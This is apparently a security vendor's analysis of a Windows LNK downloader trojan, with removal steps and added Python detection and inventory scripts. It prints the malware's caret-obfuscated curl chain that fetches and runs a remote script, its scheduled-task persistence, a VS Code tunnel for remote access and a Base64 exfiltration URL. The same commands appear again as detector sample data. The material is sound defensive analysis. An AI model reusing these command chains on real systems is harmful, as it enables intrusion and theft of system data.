Trojan.LNK.DOWNLOADER.D
HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)
Windows

Malware type:
Trojan
Destructive?:
No
Encrypted?:
In the Wild:
Yes
Overview
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Technical Details
Arrival Details
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
It drops the following files:
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\python.zip
- After extracting to %AppDataLocal%\Microsoft\Python:
  - _asyncio.pyd
  - _bz2.pyd
  - _ctypes.pyd
  - _decimal.pyd
  - _elementtree.pyd
  - _hashlib.pyd
  - _lzma.pyd
  - _msi.pyd
  - _multiprocessing.pyd
  - _overlapped.pyd
  - _queue.pyd
  - _socket.pyd
  - _sqlite3.pyd
  - _ssl.pyd
  - _uuid.pyd
  - _wmi.pyd
  - _zoneinfo.pyd
  - libcrypto-3.dll
  - libffi-8.dll
  - libssl-3.dll
  - LICENSE.txt
  - pyexpat.pyd
  - python.cat
  - python.exe
  - python.zip
  - python3.dll
  - python312._pth
  - python312.dll
  - python312.zip
  - pythonw.exe
  - select.pyd
  - sqlite3.dll
  - unicodedata.pyd
  - vcruntime140_1.dll
  - vcruntime140.dll
  - winsound.pyd
It adds the following processes:
- "%System%\cmd.exe" /c start msg {Username} "安裝成功" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"
It creates the following folders:
- %AppDataLocal%\Microsoft\Python
Download Routine
It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\python.zip → legitimate Python 3.12.5 x64 zip file
- %AppDataLocal%\Microsoft\Python\update.py → malicious Python code
Other Details
It does the following:
- It displays the Windows message "安裝成功" (translated: "Installation successful") using the msg command.
- It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
- It downloads a malicious Python script file from a URL and executes using the extracted Python package.
- It requires the following command line tools to proceed with its intended routine:
  - curl
  - tar
- The executed Python code does the following:
  - It fetches the list of running processes using the tasklist command.
  - It connects to the following URL to download its component file:
    - https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
  - It saves the file it downloads using the following name:
    - %AppDataLocal%\Microsoft\vscode.zip → contains a file named code.exe
  - It adds the following folder:
    - %AppDataLocal%\Microsoft\VSCode
  - It extracts the zip file into the created folder with the following filename:
    - %AppDataLocal%\Microsoft\VSCode\code.exe
  - After extraction, it deletes the previously downloaded zip file.
  - It adds the following processes:
    - %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
    - %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
  - It saves the output of these commands into the following files:
    - %AppDataLocal%\Microsoft\VSCode\output.txt
    - %AppDataLocal%\Microsoft\VSCode\output2.txt
  - It adds the following processes:
    - schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
    - schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
  - It retrieves the following information from the affected system:
    - System Locale
    - Computer Name
    - Username
    - User Domain
    - %Program Files% Contents
    - %ProgramData% Contents
    - %System Root%\Users Contents
  - It encodes the collected information in Base64.
  - It sends the gathered information via HTTP POST to the following URL:
    - http://{BLOCKED}o.com/r/2yxp98b3/{Base64-encoded string of collected information}
  - It adds the following scheduled tasks:
    - If executed as a user:
      Location: {Root Directory}
      Name: MicrosoftHealthcareMonitorNode
      Trigger: One time at 8:00 AM on {Scheduled Task Create Time} → after being triggered, repeat every 04:00:00 indefinitely.
      Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
    - If executed as an administrator:
      Location: {Root Directory}
      Name: MicrosoftHealthcareMonitorNode
      Trigger: At log on of any user
      Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
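The behaviours above leave distinctive process command lines: the caret-split `c^u^r^l` that cmd.exe reassembles into `curl`, `pythonw.exe` from a runtime dropped under `%AppDataLocal%\Microsoft\Python` running `update.py`, `code.exe` invoked with the `tunnel` subcommand, and `schtasks /create` with the task name `MicrosoftHealthcareMonitorNode`. The following is an added example (not the vendor's detection logic and not code from the threat) that turns those indicators into regex rules run over constructed process-creation records, and shows how an analyst decodes the Base64 path segment of the beacon URL recovered from a proxy log. Assumptions: telemetry records `%AppDataLocal%` in its expanded form (`<profile>\AppData\Local`), the sample events use `alice`, `DESKTOP-01` and `example.invalid` in place of real values, and `CONSTRUCTED_REPORT` is an invented layout of the collected data, not the malware's actual format.

```python
"""Triage helpers for the command-line indicators described on this page.
Added example: rules and sample records are constructed, not vendor code."""
import base64
import re
from typing import Dict, List, Tuple

# Rule name -> regex applied to one process command line. Paths assume the
# expanded form of %AppDataLocal% that EDR/Sysmon telemetry records.
RULES: Dict[str, "re.Pattern[str]"] = {
    # Letters joined by carets, e.g. c^u^r^l: cmd.exe strips the carets and runs 'curl'.
    "caret_obfuscated_token": re.compile(r"(?<![\w^])[A-Za-z](?:\^[A-Za-z]){2,}(?![\w^])"),
    # pythonw.exe from the dropped embedded runtime executing update.py.
    "embedded_python_update_py": re.compile(
        r"AppData\\Local\\Microsoft\\Python\\pythonw\.exe.*update\.py", re.IGNORECASE),
    # code.exe from the dropped VSCode folder started with the 'tunnel' subcommand.
    "vscode_tunnel": re.compile(
        r"AppData\\Local\\Microsoft\\VSCode\\code\.exe.*\btunnel\b", re.IGNORECASE),
    # schtasks creating the persistence task name reported on this page.
    "healthcare_monitor_task": re.compile(
        r"schtasks\s+/create\b.*/tn\s+\"?MicrosoftHealthcareMonitorNode\b", re.IGNORECASE),
}

# Constructed (parent image, command line) records modelled on the page, with
# hosts replaced by example.invalid. Not real telemetry.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("explorer.exe",  # 0: the LNK's cmd.exe chain, abbreviated
     r'"C:\Windows\System32\cmd.exe" /c start msg alice "安裝成功" & c^u^r^l -s -k '
     r'https://example.invalid/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip '
     r'-o "C:\Users\alice\AppData\Local\Microsoft\python.zip" & timeout 10 '
     r'& tar -xf "C:\Users\alice\AppData\Local\Microsoft\python.zip" -C "C:\Users\alice\AppData\Local\Microsoft\Python" '
     r'& c^u^r^l -s -k https://example.invalid/update.py -o "C:\Users\alice\AppData\Local\Microsoft\Python\update.py" '
     r'& start "" /B "C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe" "C:\Users\alice\AppData\Local\Microsoft\Python\update.py"'),
    ("svchost.exe",   # 1: the scheduled task re-running the script
     r'"C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe" "C:\Users\alice\AppData\Local\Microsoft\Python\update.py"'),
    ("pythonw.exe",   # 2: the VS Code tunnel registration
     r'C:\Windows\System32\cmd.exe /c "C:\Users\alice\AppData\Local\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "DESKTOP-01"'),
    ("pythonw.exe",   # 3: persistence via schtasks
     r'schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe C:\Users\alice\AppData\Local\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f'),
    ("explorer.exe",  # 4: benign control record
     r'"C:\Program Files\Git\cmd\git.exe" pull --rebase'),
]


def scan_command_line(cmdline: str) -> List[str]:
    """Names of every rule that matches one command line, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan_events(events: List[Tuple[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """(index, parent image, matched rule names) for each event that fires at least one rule."""
    findings = []
    for idx, (parent, cmdline) in enumerate(events):
        names = scan_command_line(cmdline)
        if names:
            findings.append((idx, parent, names))
    return findings


# Invented layout of the collected data, used only to build a sample beacon URL.
CONSTRUCTED_REPORT = "en-US|DESKTOP-01|alice|WORKGROUP"


def constructed_beacon_url() -> str:
    """Beacon URL in the shape the page reports (http://host/r/<id>/<Base64>),
    built from CONSTRUCTED_REPORT with '=' padding stripped so the decoder
    has to restore it."""
    token = base64.b64encode(CONSTRUCTED_REPORT.encode()).decode().rstrip("=")
    return "http://example.invalid/r/2yxp98b3/" + token


def decode_beacon_segment(url: str) -> str:
    """Recover the text behind the last path segment of such a URL as seen in a
    proxy log; missing Base64 padding is restored before decoding."""
    segment = url.rstrip("/").rsplit("/", 1)[-1]
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment).decode("utf-8", errors="replace")


if __name__ == "__main__":
    for idx, parent, names in scan_events(SAMPLE_EVENTS):
        print(f"event {idx} (parent {parent}): {', '.join(names)}")
    print("beacon payload:", decode_beacon_segment(constructed_beacon_url()))
```

Record 3 fires two rules at once because the `/tr` argument of `schtasks` carries the same `pythonw.exe ... update.py` string as the task's later executions; correlating the task name with that path is a stronger signal than either alone. The caret rule is intentionally narrow (three or more caret-joined letters) so that a single stray `^` escape in an ordinary batch command does not fire it.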
Solution
Step 1
For Windows ME and XP users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Note: Not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Restart in Safe Mode
Step 5
Search and delete these files
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
Step 6
Search and delete these folders
- %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
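Before deleting, a responder usually wants a quick inventory of which of the artifacts from Steps 5 and 6 are actually present on a host, plus whether the persistence task still exists. The following is an added example (not the vendor's removal tool) that reports the presence of the identifying files and the two folders under a caller-supplied `%AppDataLocal%` root and deletes nothing. It lists only the files that are unique to this threat, since the `.pyd`/`.dll` members of the dropped runtime live inside the folders that Step 6 removes whole. Assumptions: the `schtasks /query /tn` check only runs on Windows and returns False elsewhere, and `seed_constructed_layout()` builds a throwaway directory tree of placeholder files so the checker can be exercised offline.

```python
"""On-host inventory of the artifacts listed in the removal steps on this page.
Added example: reports only, deletes nothing."""
import os
import subprocess
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Step 5 files that identify this threat, as path components under %AppDataLocal%.
ARTIFACT_FILES: List[Tuple[str, ...]] = [
    ("Microsoft", "python.zip"),
    ("Microsoft", "vscode.zip"),
    ("Microsoft", "Python", "update.py"),
    ("Microsoft", "Python", "pythonw.exe"),
    ("Microsoft", "VSCode", "code.exe"),
    ("Microsoft", "VSCode", "output.txt"),
    ("Microsoft", "VSCode", "output2.txt"),
]
# Step 6 folders, removed whole together with the runtime files inside them.
ARTIFACT_FOLDERS: List[Tuple[str, ...]] = [("Microsoft", "Python"), ("Microsoft", "VSCode")]
TASK_NAME = "MicrosoftHealthcareMonitorNode"


def find_artifacts(appdata_local: str) -> Dict[str, List[str]]:
    """Return the Step 5 files and Step 6 folders that exist under appdata_local,
    as '/'-joined relative paths so results compare the same on every platform."""
    root = Path(appdata_local)
    files = ["/".join(p) for p in ARTIFACT_FILES if root.joinpath(*p).is_file()]
    folders = ["/".join(p) for p in ARTIFACT_FOLDERS if root.joinpath(*p).is_dir()]
    return {"files": files, "folders": folders}


def scheduled_task_present(task_name: str = TASK_NAME) -> bool:
    """True when 'schtasks /query /tn <name>' finds the task; always False off Windows."""
    if os.name != "nt":
        return False
    result = subprocess.run(["schtasks", "/query", "/tn", task_name],
                            capture_output=True, text=True)
    return result.returncode == 0


def seed_constructed_layout() -> str:
    """Create a temporary fake %AppDataLocal% tree holding a subset of the
    artifacts (placeholder content, not a real infection) and return its path."""
    root = Path(tempfile.mkdtemp(prefix="appdata_local_"))
    for parts in [("Microsoft", "Python", "update.py"),
                  ("Microsoft", "Python", "pythonw.exe"),
                  ("Microsoft", "VSCode", "output.txt")]:
        target = root.joinpath(*parts)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text("constructed placeholder\n")
    return str(root)


if __name__ == "__main__":
    import sys
    # Pass a path to inspect, or rely on LOCALAPPDATA on a Windows host.
    target = sys.argv[1] if len(sys.argv) > 1 else os.environ.get("LOCALAPPDATA", "")
    report = find_artifacts(target) if target else {"files": [], "folders": []}
    print("files present:", report["files"])
    print("folders present:", report["folders"])
    print("scheduled task present:", scheduled_task_present())
```

Run it with no argument on the affected Windows host to read `LOCALAPPDATA`, or point it at a mounted image's `AppData\Local` directory for offline review; the output tells you which Step 5 and Step 6 entries remain before you remove them.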
Step 7
Restart in normal mode and scan your computer with your AsiaInfo Security product for files detected as Trojan.LNK.DOWNLOADER.D. If the detected files have already been cleaned, deleted, or quarantined by your AsiaInfo Security product, no further step is required. You may opt to simply delete the quarantined files. Please refer to the knowledge base page for more details.